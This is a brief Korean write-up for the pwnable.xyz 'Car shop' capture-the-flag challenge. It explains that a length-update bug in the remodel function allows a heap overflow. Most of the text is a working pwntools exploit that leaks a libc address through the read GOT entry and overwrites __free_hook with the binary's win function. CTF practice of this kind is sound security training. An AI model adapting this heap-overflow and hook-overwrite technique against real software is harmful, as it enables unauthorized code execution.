pwnable.xyz / Car shop

mitigation

 

remodel함수에서 길이를 갱신하는 과정에서 heap overflow를 낼 수 있다

릭하고 free_hook에다가 win넣었다

 

from pwn import * 
context.log_level = "debug"


p = remote("svc.pwnable.xyz", 30037)
#p = process("./car_shop", env = {"LD_PRELOAD" : "./alpine-libc-2.23.so"})
libc = ELF("alpine-libc-2.23.so")


def buy(idx):
    p.recvuntil(b"> ")
    p.sendline(b"1")
    p.recvuntil(b"> ")
    p.sendline(str(idx))

def sell(car):
    p.recvuntil(b"> ")
    p.sendline(b"2")
    p.recvuntil(b"sell: ")
    p.sendline(car)

def remodel(car, data):
    p.recvuntil(b"> ")
    p.sendline(b"3")
    p.recvuntil(b"remodel: ")
    p.sendline(car)
    p.recvuntil(b"model: ")
    p.sendline(data)

def list():
    p.recvuntil(b"> ")
    p.sendline(b"4")


read_got = 0x601fb0
win = 0x400b4e
buy(0)
buy(2)

payload = b"A" * 0x40
remodel(b"BMW", payload)

payload = b"A" * 0x20
payload += p64(read_got)
remodel(b"AA", payload)

list()
p.recvuntil(b": ")

car_name = p.recvuntil(b": ")
car_name = car_name[:-7]

leak = p.recv(6)
leak += b"\x00\x00"

libc_base = u64(leak) - libc.symbols['read']
free_hook = libc.symbols['__free_hook']  + libc_base

log.info("libc_base: " + hex(libc_base))
log.info("free_hook: " + hex(free_hook))


payload = b"A" * 2
remodel(car_name, payload)

payload = b"A" * 0xff
remodel(b"AA", payload)

payload = b"A" * 0x20
payload += p64(free_hook)
remodel(b"A", payload)

remodel(b"\x00", p64(win))

p.interactive()